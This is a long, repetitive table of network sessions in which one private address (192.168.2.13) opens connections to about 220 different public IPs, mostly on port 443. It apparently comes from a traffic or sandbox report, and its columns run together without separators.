                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13500192.168.2.135993679.219.110.17443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13501192.168.2.1340784204.55.154.238443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13502192.168.2.1335682129.184.195.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13503192.168.2.1360634175.207.190.214443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13504192.168.2.1341946143.219.55.20443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13505192.168.2.1348744100.194.173.228443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13506192.168.2.134063864.101.38.252443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13507192.168.2.1342926166.14.85.214443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13508192.168.2.133603643.26.49.245443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13509192.168.2.13354164.66.185.33443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13510192.168.2.1354560222.239.64.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13511192.168.2.1333792118.55.78.49443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13512192.168.2.1335302119.194.4.161443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13513192.168.2.13404909.254.58.92443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13514192.168.2.134964623.66.4.243443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13515192.168.2.134721820.1.209.24443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13516192.168.2.1335954185.12.89.28443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13517192.168.2.1358292109.63.238.156443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13518192.168.2.1350632121.66.111.98443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13519192.168.2.1340546187.191.58.42443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13520192.168.2.135132442.84.168.5443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13521192.168.2.1353838190.157.118.58443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13522192.168.2.1359448110.215.255.24443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13523192.168.2.1333136145.42.62.34443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13524192.168.2.1351404178.142.113.21443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13525192.168.2.134543620.250.124.92443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13526192.168.2.1350252170.66.227.216443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13527192.168.2.1342562170.157.218.245443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13528192.168.2.134959475.28.142.205443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13529192.168.2.133553878.248.205.168443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13530192.168.2.133857088.118.101.130443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13531192.168.2.1339492134.29.218.20443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13532192.168.2.134859694.225.62.59443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13533192.168.2.1342174171.188.234.151443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13534192.168.2.136022690.2.239.173443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13535192.168.2.135624879.105.0.36443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13536192.168.2.135395865.27.238.0443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13537192.168.2.1360970193.59.239.232443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13538192.168.2.1344124208.37.215.169443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13539192.168.2.1342746133.172.139.220443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13540192.168.2.1350378103.36.2.100443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13541192.168.2.1333996211.117.223.42443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13542192.168.2.133817286.137.105.132443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13543192.168.2.1337252158.214.6.118443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13544192.168.2.1343042143.88.156.162443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13545192.168.2.133812237.116.175.119443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13546192.168.2.1345690205.7.219.63443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13547192.168.2.133617250.28.219.62443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13548192.168.2.1343240108.209.34.87443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13549192.168.2.1334222129.25.76.72443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13550192.168.2.1337030212.68.88.187443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13551192.168.2.1360270216.193.73.185443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13552192.168.2.1353030187.64.145.213443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13553192.168.2.1358842148.10.194.144443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13554192.168.2.133728289.90.132.184443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13555192.168.2.135482844.87.16.205443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13556192.168.2.1356532128.57.209.251443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13557192.168.2.1348308149.6.75.51443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13558192.168.2.1338976158.143.4.56443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13559192.168.2.134019896.127.33.14443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13560192.168.2.133449247.75.65.144443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13561192.168.2.133730231.80.36.72443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13562192.168.2.1336574189.109.125.155443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13563192.168.2.1339214184.85.12.132443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13564192.168.2.1344302107.186.163.233443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13565192.168.2.134004899.27.72.179443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13566192.168.2.1340876141.89.236.164443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13567192.168.2.1333772174.72.55.135443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13568192.168.2.135182427.54.9.176443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13569192.168.2.135754646.105.64.244443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13570192.168.2.133784657.12.19.70443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13571192.168.2.1351074181.221.73.111443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13572192.168.2.1347720128.208.64.148443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13573192.168.2.1357346157.54.163.212443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13574192.168.2.1355432123.222.67.211443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13575192.168.2.1349350112.29.211.241443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13576192.168.2.1340664182.243.37.254443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13577192.168.2.1351058167.149.38.20443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13578192.168.2.1353698223.72.197.80443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13579192.168.2.134485247.178.242.1443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13580192.168.2.1360982152.99.156.197443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13581192.168.2.135855253.238.95.188443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13582192.168.2.135384651.29.49.15443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13583192.168.2.1338460181.172.136.38443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13584192.168.2.1358672201.70.9.49443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13585192.168.2.1344238103.24.106.25443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13586192.168.2.1359384119.183.19.100443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13587192.168.2.1352658189.139.190.112443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13588192.168.2.13452444.116.239.103443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13589192.168.2.1357324169.181.75.183443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13590192.168.2.1339538177.16.49.42443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13591192.168.2.1344632146.39.188.189443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13592192.168.2.1338658196.50.193.82443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13593192.168.2.1355502221.94.206.84443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13594192.168.2.1358860128.34.129.235443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13595192.168.2.135032074.132.216.2068080
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13596192.168.2.134903234.49.24.2028080
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13597192.168.2.1360828185.68.229.200443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13598192.168.2.135833891.211.160.190443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13599192.168.2.134361071.66.246.152443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13600192.168.2.1335618220.226.207.182443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13601192.168.2.13366025.162.2.223443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13602192.168.2.1334480171.26.55.87443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13603192.168.2.1342888211.82.37.45443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13604192.168.2.1333172165.107.19.115443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13605192.168.2.1350888212.41.229.197443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13606192.168.2.1344796122.71.125.26443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13607192.168.2.1345356119.116.119.156443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13608192.168.2.134642844.133.180.243443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13609192.168.2.133557093.50.237.241443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13610192.168.2.1341866144.34.41.144443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13611192.168.2.134699639.162.28.192443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13612192.168.2.134958837.183.9.140443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13613192.168.2.133689412.76.59.213443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13614192.168.2.134766213.110.229.113443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13615192.168.2.1343984219.12.184.16443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13616192.168.2.133796459.73.135.188443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13617192.168.2.1342302134.170.18.244443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13618192.168.2.1360506192.144.133.210443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13619192.168.2.1357392184.183.122.182443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13620192.168.2.1342102186.63.241.233443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13621192.168.2.134907283.132.204.251443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13622192.168.2.1352162129.202.193.251443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13623192.168.2.1340816193.216.61.189443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13624192.168.2.133468664.219.215.186443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13625192.168.2.1354078119.116.109.89443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13626192.168.2.135964653.165.127.79443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13627192.168.2.1353412177.42.209.5443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13628192.168.2.135609223.249.33.113443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13629192.168.2.1353408209.133.185.157443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13630192.168.2.135717413.37.215.13443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13631192.168.2.1357098160.19.51.192443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13632192.168.2.133435845.237.86.3443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13633192.168.2.1354360148.151.190.59443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13634192.168.2.1350600208.110.253.98443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13635192.168.2.1339436179.87.113.139443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13636192.168.2.133647648.138.153.153443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13637192.168.2.1337458163.50.242.183443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13638192.168.2.1360752102.31.83.45443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13639192.168.2.1345182205.21.8.74443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13640192.168.2.1356714118.44.98.66443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13641192.168.2.1354986110.19.218.217443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13642192.168.2.1350398129.252.16.217443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13643192.168.2.1354978203.219.46.114443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13644192.168.2.1333628222.99.222.181443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13645192.168.2.133762092.243.130.58443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13646192.168.2.1337114219.90.9.52443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13647192.168.2.1340292198.195.69.153443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13648192.168.2.1348528196.197.254.202443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13649192.168.2.1346586209.120.143.213443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13650192.168.2.134304427.233.41.42443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13651192.168.2.1339066145.69.52.248443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13652192.168.2.1351734150.238.58.165443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13653192.168.2.134985251.228.209.54443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13654192.168.2.1351890153.135.211.113443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13655192.168.2.135958279.181.27.61443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13656192.168.2.1345962167.187.48.175443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13657192.168.2.1334722119.162.106.90443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13658192.168.2.1335462128.214.212.162443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13659192.168.2.1356984132.150.176.201443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13660192.168.2.134706068.229.159.216443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13661192.168.2.13557629.131.136.100443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13662192.168.2.1355342105.41.226.101443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13663192.168.2.135513848.126.8.175443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13664192.168.2.1349472157.241.59.83443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13665192.168.2.1355164165.76.65.220443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13666192.168.2.133664890.48.227.169443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13667192.168.2.1345110198.85.252.86443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13668192.168.2.1339420174.80.61.162443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13669192.168.2.1352854132.196.26.22443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13670192.168.2.1347024120.40.133.155443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13671192.168.2.1354890101.83.186.214443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13672192.168.2.1355060206.196.129.201443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13673192.168.2.1351140144.30.92.27443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13674192.168.2.1352802171.103.8.64443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13675192.168.2.1344000144.64.178.83443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13676192.168.2.134490045.159.9.148443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13677192.168.2.1346080121.11.102.69443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13678192.168.2.1335154155.72.238.63443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13679192.168.2.1332782207.82.253.167443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13680192.168.2.1353270212.237.1.122443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13681192.168.2.1350784137.0.0.60443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13682192.168.2.1344100121.130.236.248443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13683192.168.2.1347078131.109.173.176443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13684192.168.2.1354726136.11.171.148443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13685192.168.2.134295035.105.219.189443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13686192.168.2.133644065.77.183.192443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13687192.168.2.1347340205.49.131.238443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13688192.168.2.1355498205.15.230.205443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13689192.168.2.1338582171.33.84.129443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13690192.168.2.1352478106.114.207.226443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13691192.168.2.1344240182.115.235.217443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13692192.168.2.1337008201.140.178.151443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13693192.168.2.1343032156.227.119.37443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13694192.168.2.133292257.95.226.104443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13695192.168.2.1337294144.57.61.79443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13696192.168.2.1333672130.88.186.244443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13697192.168.2.13476102.108.203.229443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13698192.168.2.134752086.217.55.147443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13699192.168.2.1353862120.206.18.69443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13700192.168.2.1347538128.1.10.7443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13701192.168.2.1347480121.233.255.171443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13702192.168.2.135484834.206.129.134443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13703192.168.2.135430071.229.112.198443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13704192.168.2.1349440218.150.19.25443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13705192.168.2.134495653.155.155.73443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13706192.168.2.1343672206.168.76.0443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13707192.168.2.1341850158.80.254.157443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13708192.168.2.134459062.142.197.31443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13709192.168.2.1338576120.185.188.49443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13710192.168.2.1339156218.228.218.63443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13711192.168.2.1340278187.132.64.219443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13712192.168.2.133764827.102.152.42443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13713192.168.2.1359650175.19.207.209443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13714192.168.2.1355796201.246.152.82443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13715192.168.2.135906898.6.115.28443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13716192.168.2.1343402207.182.221.253443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13717192.168.2.1335532187.175.45.141443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13718192.168.2.1333768169.177.52.196443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13719192.168.2.135828450.216.236.98443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13720192.168.2.1359592209.198.226.202443
                                        TimestampBytes transferredDirectionData


